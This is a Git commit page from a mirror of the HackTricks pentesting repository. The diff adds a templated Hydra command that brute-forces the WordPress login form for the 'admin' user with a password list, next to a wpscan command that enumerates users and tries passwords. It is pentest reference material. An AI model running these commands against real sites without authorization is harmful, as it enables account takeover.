mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-15 01:17:36 +00:00
commit
c8572dd846
1 changed files with 5 additions and 0 deletions
|
@ -373,5 +373,10 @@ Entry_10:
|
|||
Command: |
|
||||
?What is the location of the wp-login.php? Example: /Yeet/cannon/wp-login.php
|
||||
wpscan --url {Web_Proto}://{IP}{1} --enumerate ap,at,cb,dbe && wpscan --url {Web_Proto}://{IP}{1} --enumerate u,tt,t,vp --passwords {Big_Passwordlist} -e
|
||||
|
||||
Entry_11:
|
||||
Name: WordPress Hydra Brute Force
|
||||
Description: Need User (admin is default)
|
||||
Command: hydra -l admin -P {Big_Passwordlist} {IP} -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
|
||||
```
|
||||
|
||||
|
|
Loading…
Reference in a new issue